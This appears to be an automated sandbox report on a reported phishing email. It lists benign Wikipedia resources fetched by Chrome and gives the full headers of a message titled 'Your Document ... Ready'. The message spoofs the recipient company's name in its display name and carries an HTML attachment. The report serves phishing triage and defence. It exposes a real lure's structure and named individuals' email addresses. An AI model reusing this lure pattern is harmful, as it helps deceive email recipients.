                                        Size (bytes):322
                                        Entropy (8bit):5.870964278824857
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EEF4976AA36C53B8D279A5E47D5EB82A
                                        SHA1:3E98ADDCF8EC0527ACBB1A82712D176FA67BC7B8
                                        SHA-256:7F7FE0891E04668FFCA86613E2217462785A5711EFEDF2653694ADF8B4DCEDC9
                                        SHA-512:EF26641CE79FD7E0F64D3951877FBF1974C50B4192325BC1E399B98AA4C58A6B773C899BB12CDB4B2C1F251ADD06E6458CF5D9AF0A92BED615F7EE2EB4C34EB3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR..............~+.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.......pp.HH....{{q..*....bKGD..h.Q....tIME.....)'.......-IDAT..c` .0*)........... &...8.f".%h.........9#.)...%tEXtdate:create.2024-08-31T02:41:38+00:00&I.....%tEXtdate:modify.2024-08-31T02:41:38+00:00W.~.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:downloaded
                                        Size (bytes):186270
                                        Entropy (8bit):5.146069612645557
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:0777B8D616EA5A32EC9E404604B272B5
                                        SHA1:5396582FA661C6A744BCD1D6455913ABDFEF4DFA
                                        SHA-256:2F48B54BB6975023B390D00FA8C045AE227B149274F6D1ED5EF8B0F2790DC97E
                                        SHA-512:607A3CA0CF60FB5834C60FC188C49040FC15525FEBBAB3DDF3758AC813B11FD257F3E786E81FE7DAE6406870461ECACCF1F4A1C8D85A205B698CF0337A7FCCCD
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022
                                        Preview:.mw-cite-backlink,.cite-accessibility-label{-webkit-user-select:none;-moz-user-select:none;user-select:none}.mw-references-columns{-moz-column-width:30em;column-width:30em;margin-top:0.3em}.mw-parser-output .mw-references-columns .references{margin-top:0}.mw-references-columns li{page-break-inside:avoid;break-inside:avoid-column}ol.references{counter-reset:mw-ref-extends-parent mw-references list-item}ol.references > li{counter-increment:mw-ref-extends-parent mw-references;counter-reset:mw-ref-extends-child}ol.references .mw-extended-references{list-style:none;margin-left:2em;padding:0}.mw-extended-references > li::before{counter-increment:mw-ref-extends-child;content:counter(mw-ref-extends-parent,decimal) '.' counter(mw-ref-extends-child,decimal) '. '}sup.reference{unicode-bidi:-moz-isolate;unicode-bidi:-webkit-isolate;unicode-bidi:isolate;white-space:nowrap;font-weight:normal;font-style:normal}ol.references li:target,sup.reference:target{background-color:var(--background-color-progre
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):8008
                                        Entropy (8bit):7.964786497900993
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7D6D5878FDAA45B7683A7CFA1CF23392
                                        SHA1:DA5A8A72BFF60B1FE5F65545D74732FF910EF955
                                        SHA-256:2D7B427F517B3C7F4006DC3A7CC74701EC0B490E01D1030E3F260BBAB902F2D5
                                        SHA-512:15E1C4D513CBA2EBD82DD74005A8FFC8C418E133D167D0245243159BAA4E637FD7464F9603ED28D8CE16B72EB1B40EC859FEDEB3C1C7C39FB68B4ADC3D2E766C
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Flag_of_the_African_Union.svg/220px-Flag_of_the_African_Union.svg.png
                                        Preview:RIFF@...WEBPVP8L3.../.$.U..m....{.#b.h*-I.T..H.=A^K.EX.i.!.j.'....a.F6D0F..;...d.ml.`.Fv..v)M.o..1.h.p.+.. ..#......L.XE9N....7..G.n/j"Y.f(qA...`....L*5..0r...-=..N.....O.......?..m7.......`7s....n..........[.....{8..P..'.<<%.T.0....0/8dY.~7Gj..-.m....R.z...,..o.h.....YZ.VI.a,9.5Z..sIs^......-...29.,..s.F-.F..jK.PI.f.......J..Ch..s....%.+.%Uh.Fr_..*i`.g,Y#Ku...)|cN...Z...li.J=....,e...#K..X....KaX..g`.....`Kuh8m..L.`.--.@I. .`.........m...I.......0....mo..:...Yi....'/v.'.Xv.......O...u.......7.P.H.. ..T.e.....|.......,Or.p......B...U|?9...=.....5j.3...rgw..W..\.oo...1Gm.4..@~.o...?.+s..9.m.........@1{.l*.6...hJ...\u......sy@........y. o.....?+=....fJ....d`.th..3....x......i!.....y..p....>..@..0...n..h...(.R.|.. .(D~....0.}..S.]...Ca..x;/ot...5bU....v..p..VJ...m.~..`n.Kd..}M..oCE#.E.u`....w..8..EU9..S.../....F.m..n..Z..sx..s%....7}...*..MA@$i.M.2........f.9...t...o;.....1...M1.5.....>.`......T.ktNv}s`m.W.0...O...0;(....>...R....Vx.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):5.063769880037573
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F99AD5DABC437FC03CE06A1257F99F38
                                        SHA1:D0E5E137AA05FC9F948D72F844D209A356885A70
                                        SHA-256:5445B87F97B5C6CE7C0CA4ED6272535D750942B3B042872F8D4F1FE8457777EB
                                        SHA-512:3F0F1CC8D932FCEA6AAD9319403CBD630C355D8BE3DE38E1DE55BE38CD7EC5DB521B64CEDACBB8D6C50A2CAD29B13B2B7454DB1B33AA8EC2654E8D7065BDDA1A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/* Not centrally logged in */.(function(){var t=new Date();t.setTime(t.getTime()+86400000);try{localStorage.setItem('CentralAuthAnon',t.getTime());}catch(e){try{document.cookie='CentralAuthAnon=1; expires='+t.toGMTString()+'; path=/';}catch(e2){}}}());
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (1417)
                                        Category:dropped
                                        Size (bytes):199418
                                        Entropy (8bit):5.378613393175061
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F20A2A198C154DD7D926076B7B474BB0
                                        SHA1:6C213DCA793328CC175B282719A8C63EECC86585
                                        SHA-256:E4F3D30D5D3CA43C63C037AD893A873F42F6D47600E6837CCB4235BB3B93A84F
                                        SHA-512:112D3132E120D1ABD379BA1106C3CED4964F635FE04C9F48FA2133186F246F40AB098D7D5F83B804C807FBEBA71E33AC15A53B74A8E857B64230263E20C2551F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:mw.loader.impl(function(){return["skins.vector.search.codex.scripts@1hk6y",{"main":"codex.js","files":{"codex.js":function(require,module,exports){module.exports=new Proxy({"CdxTypeaheadSearch":require("./_codex/CdxTypeaheadSearch.cjs")},{get(target,prop){if(!(prop in target)){throw new Error(`Codex component "${prop}" `+'is not listed in the "codexComponents" array '+'of the "skins.vector.search.codex.scripts" module in your module definition file');}return target[prop];}});.},"_codex/useComputedDirection.cjs":function(require,module,exports){"use strict";const u=require("vue");function o(n){const t=u.ref(null);return u.onMounted(()=>{const e=window.getComputedStyle(n.value).direction;t.value=e==="ltr"||e==="rtl"?e:null}),t}module.exports=o;.},"_codex/useComputedLanguage.cjs":function(require,module,exports){"use strict";const t=require("vue");function a(u){const n=t.ref("");return t.onMounted(()=>{let e=u.value;for(;e&&e.lang==="";)e=e.parentElement;n.value=e?e.lang:null}),n}module.e
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):1360
                                        Entropy (8bit):7.809688542033249
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A97F37BE99E495654BF63692EE0799D9
                                        SHA1:311F5D186B568A2FB8D9DEDAEE499768C7013F12
                                        SHA-256:9A7C5A2915C97E3E717E256A09A6F10AE02A35550EC87F974D40DEB50EA3F058
                                        SHA-512:3C0C50BF1B7837B04003874506179E5CBCA170068C1CE832104FCAFDD525474AA5B9FB4CBF9A85B7571FA089C6A395E4746E7BBA38A8A871CF3BCB99E3B31012
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/34px-Wikiquote-logo.svg.png
                                        Preview:RIFFH...WEBPVP8L<.../!....P........!"&...FNlm...E.N.;.....g.M m......\....U.:(B. ..X.........kF6.......Z.@......$.S>.?....0.:$...'...k.z..J...8..fA..3k..~.y.........l.m.l...W;.m3.mCa.6.....p.._......w.'K..,...%...kY..h.....*+3.S.yI.....-.AZd.p.I....\qw9..I......M...].3.hf.@.. ..*.(.v..%]..|..E..k\...'..3....e........../...$...._....{..I.d./.9m\.%.N..O7TK..*@..%.<^.k|]..K..[.lu...f..:...y.a..r,...;.e]R;..n.o..%.#...'__1..t].&\f....s.._t....j..XZ..Zi......q..(L.a#..Q..a......;.E..g..)...cqx..a.....y..KY...8n5).e....F+J"b9..P.7I....XP..u..L..>... .Y..a.,d.w..sa.{......h..B...._H.."..8!#..........{',.:...ur\r.|.{G}g..t...q.s.L.;..0.l..e6....{D..C.\b%].o,TK....lY..qA..]..$>.n*hPafA.....`h.AR....Y....uS..T....0.u..\BC1...0,...r.|..N.j.:.....R.R.P.....)|...63...V1.a.m.aK...]J..~.(../..(...p|.)..P.SfA.`...I\.>q..U.M......N.A.......r.Q.9a..\.%z.;..N.u..,.=..l}..x;p........!,.:.....!...X.+os.vB.....-+.).F. ..,H...........$..B...~..x0....Y.P.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):526
                                        Entropy (8bit):7.592290127884418
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:76A5EDF0BD61368AED4D36E986E02464
                                        SHA1:B6F6A30DEE09E958F3E14A27A7B16641ED00B87D
                                        SHA-256:2BC4EE8140E6B31E45FBD24E35F80D4A70E951E3748E90901D4C7A22E624A722
                                        SHA-512:6DFA1FD70B0A53B689141881B636DA2E4F088E21FF52F789D9A2FB9A1BEBE7E09D2A28ADE2F1BFE2CEEA77E182953E7701780C2A47BB4477E1C98C709A416E9E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/en/thumb/9/96/Symbol_category_class.svg/16px-Symbol_category_class.svg.png
                                        Preview:RIFF....WEBPVP8L..../...._.&.$G..q..~&..{jh8l..$....o(.........$I...9....._..m.......`..jD..D..S.~....@.U.@..D.A..$.@.I}..y....`.%.J9.x..,...h.F..Y...P.{...VK.Q....QU. ..2D.H........7..f.W.m...d.....*....z..A.,......=.......U..D.C.Q*7..#\t,.e..[.D..=^..Gf.........T..F....+\ J..E..lY....D#.".(.@.m.tsb....8.m...n.?;....O........Kbuv.|.N..'..a!.....N..da3...w..E....0y..S...@..#.H^.....|........R2........g).....g.}...r..O<s..k;....&.....w_.]*[.r..o.$....m&.p..(..X.%....l...9..5.....$.:..*..:$U.B...
                                        File type:RFC 822 mail, ASCII text, with very long lines (2137), with CRLF line terminators
                                        Entropy (8bit):5.730534327721142
                                        TrID:
                                        • E-Mail message (Var. 5) (54515/1) 100.00%
                                        File name:phish_alert_sp2_2.0.0.0.eml
                                        File size:872'103 bytes
                                        MD5:6f4ff2c8e1e2d9f883dfa7f6777dc468
                                        SHA1:662e71a653730109aeab1c74600d323df11361cc
                                        SHA256:d6dc432815634acc0b22c66929f2b4e831442a0920b8c424e4b702125af43c49
                                        SHA512:0c806eeaf9784e8f4bd0491e800f45763a8c1706ceb4cac2613ca0804138e40c02e9d69336fa6fe3e40e049fdb9425603393202cfe2ee0bd2cf8c5b19f139f8b
                                        SSDEEP:12288:AeoQXiLAyj14e27t8VUmJ4E8G9jxK9OB4MSvaHfXMzWLkaofr/xoD1JWw/qxDFgP:yqyp4e154H9g1H6MkDfrJo5JZqFGP
                                        TLSH:A505F12517842FE98A542A2FF039320D57F41746C57663CDAB63ED0BAFFEC180A261B5
                                        File Content Preview:Received: from DB8P189MB0952.EURP189.PROD.OUTLOOK.COM.. (2603:10a6:10:162::11) by AM8P189MB1316.EURP189.PROD.OUTLOOK.COM with.. HTTPS; Tue, 8 Oct 2024 08:41:11 +0000..Received: from DU2P250CA0024.EURP250.PROD.OUTLOOK.COM.. (2603:10a6:10:231::29) by DB8P18
                                        Subject:Your Document-51036605004-LCnAB6Il5W Ready
                                        From:Gms-worldwide 5855643978-cSUVmNfmmG <rwarren@bdcontractorservices.com>
                                        To:Dmytro Drobot <d.drobot@gms-worldwide.com>
                                        Cc:
                                        BCC:
                                        Date:Tue, 08 Oct 2024 08:37:58 +0000
                                        Communications:
                                          Attachments:
                                          • Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html
                                          Key Value
                                          Receivedfrom [52.235.1.214] (port=45628 helo=masopa.internal.cloudapp.net) by gtxm1208.siteground.biz with esmtpsa (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.98) (envelope-from <rwarren@bdcontractorservices.com>) id 1sy5j5-00000000FGc-2Ans for d.drobot@gms-worldwide.com; Tue, 08 Oct 2024 08:37:51 +0000
                                          Arc-Seali=1; cv=none; a=rsa-sha256; d=instance-us-central1-0w08.prod.antispam.mailspamprotection.com; s=arckey; t=1728376678; b=32jHgTpjPjb95gxxeHnGgrHqIS/85rJ4sjQ+FCreuigGzwv8TREHi0WHSUEpifO+riWk8U0+BH CyPJvNwLA8cD0CbeHxbLv7WYF9Wkn4Qjy4HCrWTdk7SbNAUrnqbMcSFo7QVZCKdopxvN/myNS8 oauRNkvSv3tPAQgjBrbnwh3mOd2LMEGcjwSa+f5ioMVeggbiOicUDCjvro2o32XS+LeqoVhEPq IuIP/CmaEe3fCgLAnrpb6s2XHFqyX7/JsS83nBOFlEioAKIagJFniBLcHJIoi15M8J3myInpq5 HVMlhNdtmj/jPsDfbyjFJ7kSPIXGJDDrYUMW3sDT7F6QZw==;
                                          Arc-Message-Signaturei=1; a=rsa-sha256; c=relaxed; d=instance-us-central1-0w08.prod.antispam.mailspamprotection.com; s=arckey; t=1728376678; bh=inLXLoP10Sgi28YUawecS9TADHLYb+TYBEiV5cynMTw=; h=Message-ID:To:Sender:From:Subject:MIME-Version:Content-Type:DKIM-Signature; b=FlvpltkNQxm35FaiQNa5JNtv//JYiiPIiT/ixJa2QMVJvLv4TyxKIpMn1sLeOwHOfjAu1oxtrJ 3hOHnNOelRBtlGJNcoq0hiKKu/RI9czWkuhKIBv62rJ1VlBPnjgaXpmLqhFzxsdocIDom/7aGg HhhbWmKiBzLDS6j47ZXindKvRXjv2dmVtRlj9lrbVkaull0CI1FUrqHYX2oG9yRzlloDFbM4Sv F3V7KQc2p5X9Rf9XpS/CXiAaM404mqBZRhlr38Et/Rx+C1i46GWkK5DpVUzzZYrEBWvaK4Qbo/ 3ertEJtkayIO4dPk/gNkCdcmVZr+3q98WfiQAN7R+YIKmA==;
                                          Arc-Authentication-Resultsi=1; instance-us-central1-0w08.prod.antispam.mailspamprotection.com; smtp.remote-ip=34.174.92.112; iprev=pass (112.92.174.34.bc.googleusercontent.com) smtp.remote-ip=34.174.92.112; auth=pass (LOGIN) smtp.auth=gtxm1208.siteground.biz; dkim=pass header.d=bdcontractorservices.com header.s=default header.a=rsa-sha256; arc=none
                                          Authentication-Resultsspf=pass (sender IP is 185.56.86.128) smtp.mailfrom=bdcontractorservices.com; dkim=fail (signature did not verify) header.d=bdcontractorservices.com;dmarc=pass action=none header.from=bdcontractorservices.com;compauth=pass reason=100
                                          Received-SpfPass (protection.outlook.com: domain of bdcontractorservices.com designates 185.56.86.128 as permitted sender) receiver=protection.outlook.com; client-ip=185.56.86.128; helo=delivery.antispam.mailspamprotection.com; pr=C
                                          Dkim-Signaturev=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=bdcontractorservices.com; s=default; h=To:From:Subject:date:cc:list-help: list-unsubscribe:list-subscribe:list-post:list-owner:list-archive; bh=inLXLoP10Sgi28YUawecS9TADHLYb+TYBEiV5cynMTw=; b=Vk/Wk1TDirekyOxv6OXPQ2VfV0 ihq2u+uZlgKcS6Dikql7xvGa63zbBiXMUTemZmAF3geG1GQVO79jn2ds5Q7pzTyIkRMDdMY4TLUBv zgUylK4H1yfIJY3SHkFfGQ4GK5O9P3z+mKsxQLyT8Uac9Mux1hAp66y/8HKWcW8fxFPk=;
                                          Content-Typemultipart/mixed; boundary="----sinikael-?=_1-17283774820660.46235423923423147"
                                          MIME-Version1.0
                                          SubjectYour Document-51036605004-LCnAB6Il5W Ready
                                          FromGms-worldwide 5855643978-cSUVmNfmmG <rwarren@bdcontractorservices.com>
                                          Senderrwarren@bdcontractorservices.com
                                          ToDmytro Drobot <d.drobot@gms-worldwide.com>
                                          X-Priority1
                                          X-AntiabuseSender Address Domain - bdcontractorservices.com
                                          X-Sgantispam-Id69f5b743bd20d7750a3f0487d6cfeeb6
                                          Message-Id <E1sy5j7-00000003OwC-3cmS@instance-us-central1-0w08.prod.antispam.mailspamprotection.com>
                                          Authentication-Results-Original instance-us-central1-0w08.prod.antispam.mailspamprotection.com; iprev=pass (112.92.174.34.bc.googleusercontent.com) smtp.remote-ip=34.174.92.112; auth=pass (LOGIN) smtp.auth=gtxm1208.siteground.biz; dkim=pass header.d=bdcontractorservices.com header.s=default header.a=rsa-sha256; arc=none
                                          Return-Pathrwarren@bdcontractorservices.com
                                          DateTue, 08 Oct 2024 08:37:58 +0000
                                          X-Ms-Exchange-Organization-Expirationstarttime08 Oct 2024 08:37:58.0754 (UTC)
                                          X-Ms-Exchange-Organization-ExpirationstarttimereasonOriginalSubmit
                                          X-Ms-Exchange-Organization-Expirationinterval1:00:00:00.0000000
                                          X-Ms-Exchange-Organization-ExpirationintervalreasonOriginalSubmit
                                          X-Ms-Exchange-Organization-Network-Message-Id 2e1ff60a-b79d-4e2f-795d-08dce774830e
                                          X-Eopattributedmessage0
                                          X-Eoptenantattributedmessageb257b72a-b83c-4005-915b-ce5ce92eaad2:0
                                          X-Ms-Exchange-Organization-MessagedirectionalityIncoming
                                          X-Ms-PublictraffictypeEmail
                                          X-Ms-Traffictypediagnostic DU2PEPF0001E9C1:EE_|DB8P189MB0952:EE_|AM8P189MB1316:EE_
                                          X-Ms-Exchange-Organization-Authsource DU2PEPF0001E9C1.eurprd03.prod.outlook.com
                                          X-Ms-Exchange-Organization-AuthasAnonymous
                                          X-Ms-Office365-Filtering-Correlation-Id 2e1ff60a-b79d-4e2f-795d-08dce774830e
                                          X-Ms-Exchange-AtpmessagepropertiesSA|SL
                                          X-Ms-Exchange-Organization-Scl1
                                          X-Microsoft-Antispam BCL:0;ARA:13230040|12012899012|3072899012|2092899012|38000299018|2613699012|43540500003;
                                          X-Forefront-Antispam-Report CIP:185.56.86.128;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:delivery.antispam.mailspamprotection.com;PTR:delivery.antispam.mailspamprotection.com;CAT:NONE;SFS:(13230040)(12012899012)(3072899012)(2092899012)(38000299018)(2613699012)(43540500003);DIR:INB;
                                          X-Ms-Exchange-Crosstenant-Originalarrivaltime08 Oct 2024 08:37:58.0754 (UTC)
                                          X-Ms-Exchange-Crosstenant-Network-Message-Id 2e1ff60a-b79d-4e2f-795d-08dce774830e
                                          X-Ms-Exchange-Crosstenant-Idb257b72a-b83c-4005-915b-ce5ce92eaad2
                                          X-Ms-Exchange-Crosstenant-Authsource DU2PEPF0001E9C1.eurprd03.prod.outlook.com
                                          X-Ms-Exchange-Crosstenant-AuthasAnonymous
                                          X-Ms-Exchange-Crosstenant-FromentityheaderInternet
                                          X-Ms-Exchange-Transport-CrosstenantheadersstampedDB8P189MB0952
                                          X-Ms-Exchange-Transport-Endtoendlatency00:03:13.5818575
                                          X-Ms-Exchange-Processed-By-Bccfoldering15.20.8026.020
                                          X-Microsoft-Antispam-Mailbox-Delivery ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003)(1420198);
                                          X-Microsoft-Antispam-Message-Info 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
                                          Content-Transfer-Encoding7bit

                                          Icon Hash:46070c0a8e0c67d6